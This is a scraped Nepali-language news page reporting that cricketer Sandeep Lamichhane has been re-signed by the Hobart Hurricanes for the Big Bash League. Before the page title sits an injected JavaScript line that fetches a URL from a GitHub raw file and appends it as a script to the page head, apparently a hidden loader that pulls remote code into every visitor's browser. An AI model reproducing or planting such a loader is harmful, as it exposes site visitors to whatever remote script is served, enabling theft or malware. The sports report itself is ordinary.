;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सन्दीप लामिछानेले होबार्ट हुरिकेन्सबाटै नया सिजनको बिग बास लिग (बीबीएल) खेल्ने पक्का – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सन्दीप लामिछानेले होबार्ट हुरिकेन्सबाटै नया सिजनको बिग बास लिग (बीबीएल) खेल्ने पक्का
Breaking News

सन्दीप लामिछानेले होबार्ट हुरिकेन्सबाटै नया सिजनको बिग बास लिग (बीबीएल) खेल्ने पक्का

जुनेली न्यूज, काठमाण्डौ | नेपाली राष्ट्रिय टिमका लेगस्पीनर सन्दीप लामिछानेले होबार्ट हुरिकेन्सबाटै नया सिजनको बिग बास लिग (बीबीएल) खेल्ने पक्का भएको छ ।होबार्टले बिहीबार नया सिजनका लागि सन्दीपलाई पुनः अनुबन्ध गरिएको जनाएको छ ।
होबार्टले सन्दीपलाई पहिलो विदेशी खेलाडीको रुपमा अनुबन्ध गरेको हो । गत सिजन सन्दीपले होबार्टबाटै खेलेका थिए । उनले ८ खेलमा ८ विकेट लिएका थिए ।
सन्दीपले अष्ट्रेलिया गएर हुरिकेन्सबाट खेल्न आफू तयार रहेको बताएका छन् । क्रिक इन्फोसाग कुरा गर्दै उनले गत सिजन होबार्टबाट खेल्दा आफूले निकै मज्जा लिएको र यस सिजन पूरै प्रतियोगिता खेल्न उत्साहित रहेको बताएका छन् ।

बिग बासको नया सिजन आगामी डिसेम्बर ५ देखि २०२२ को जनवरी २८ सम्म हुने छ ।

सन्दीपले गत सिजनको बिग बास लिग खेलेपछि कुनै फ्रेन्चाइज लिग खेलेका छैनन् । उनले भिसा समस्याका कारण टी-२० भाइटालिटी ब्लास्ट र दी हन्ड्रेड लिग गुमाएका थिए

आइसीसी विश्वकप क्रिकेट लिग-२ अन्तर्गत ओमान र अमेरिकासागको त्रिकोणात्मक एकदिवसीय सिरिजका लागि नेपाली टिम हाल ओमानमा छ ।

 

फेसबुक प्रतिक्रियाहरु